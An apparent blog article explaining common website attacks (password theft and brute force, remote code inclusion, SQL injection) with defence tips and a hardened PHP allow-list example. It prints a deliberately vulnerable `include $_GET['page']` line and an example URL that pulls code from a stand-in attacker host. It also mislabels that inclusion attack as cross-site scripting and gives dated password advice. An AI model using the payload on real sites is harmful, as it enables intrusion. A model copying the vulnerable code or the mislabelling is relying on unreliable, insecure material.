Here are the most common techniques used to hack a website

Hacking sites that are least protected by password – Bypass authentication

It’s the webmaster’s nightmare: hackers accessing the site with stolen passwords that should have been kept under control. Usually the hackers are people well known to the webmaster. They use various techniques to steal the password: they access the webmaster’s email, or they use key loggers or network sniffers to capture the passwords used in day-to-day work.

Hackers can also use techniques such as brute-force attacks (dictionary attacks) to find weak passwords. The more complex the password, the more difficult it is for hackers to find it using this method.

How to defend

  • It’s advised that passwords be made of capital letters, small letters, numbers and symbols, and be at least 6-10 characters long.
  • Change the passwords at frequent intervals
  • Don’t store passwords in email
  • Use the latest antivirus software to make sure that the system is free of key loggers

XSS or cross-site scripting

In this method the hacker gains access to your website through a previously disclosed or undisclosed security vulnerability in the server software or the scripting language. Hackers try to execute code hosted on a remote computer and so reach the secure areas of the website.

For example, in Apache/PHP, if you include a page like this

include $_GET['page'];

and use a GET request to include aboutus.php like this: http://yoursite.com/?page=aboutus, hackers can execute a remotely hosted page like this: http://yoursite.com/?page=http://hackerssite.com/directorylist.php

This is the simplest method, and there are many variations of it, such as intercepting JavaScript to execute XSS attacks. Nowadays it is all too common, as webmasters move towards Web 2.0 techniques and use loosely coded AJAX.

Read more at http://en.wikipedia.org/wiki/Cross-site_scripting

How to defend

  • Stay aware of the XSS attacks happening around
  • Update the web server software and server scripting language
  • Disable unwanted services in the server software
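
The include-from-request pattern shown above (commonly called remote file inclusion) can also be closed in the application itself. The following is an added example, not code from the original article: it replaces the direct include with an allow-list lookup. The `./pages` directory, the page names and the `resolve_page` helper are assumptions made for illustration.

```php
<?php
// Hardened form of: include $_GET['page'];
// Assumptions for this example: templates live in ./pages, and the three
// page names below are the only ones the site serves.

const PAGES_DIR = __DIR__ . '/pages';

// Allow-list: request value => file on disk. The request value is only ever
// used as a lookup key, never as part of a path or URL.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'aboutus' => 'aboutus.php',
    'contact' => 'contact.php',
];

/**
 * Return the local file for a requested page, or null if it is not allowed.
 */
function resolve_page($requested): ?string
{
    // ?page[]=x arrives as an array; reject anything that is not a string.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    return PAGES_DIR . '/' . ALLOWED_PAGES[$requested];
}

$path = resolve_page($_GET['page'] ?? 'home');

if ($path === null || !is_file($path)) {
    // Unknown names, remote URLs and "../" sequences all end up here.
    http_response_code(404);
    exit('Page not found');
}

include $path;

// Defence in depth, in php.ini: keep allow_url_include = Off (the default),
// so include/require refuse http:// and ftp:// targets even if a check is missed.
```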

SQL injection

In this type of attack, hackers take advantage of the compromised database. Hackers inject carefully written SQL code through the forms available on the website (registration, feedback forms, etc.). Read more about this type of attack here:

http://www.unixwiz.net/techtips/sql-injection.html

http://en.wikipedia.org/wiki/SQL_injection

Ways to protect

  • Clean up the inputs before inserting them into the database
  • Properly escape input strings
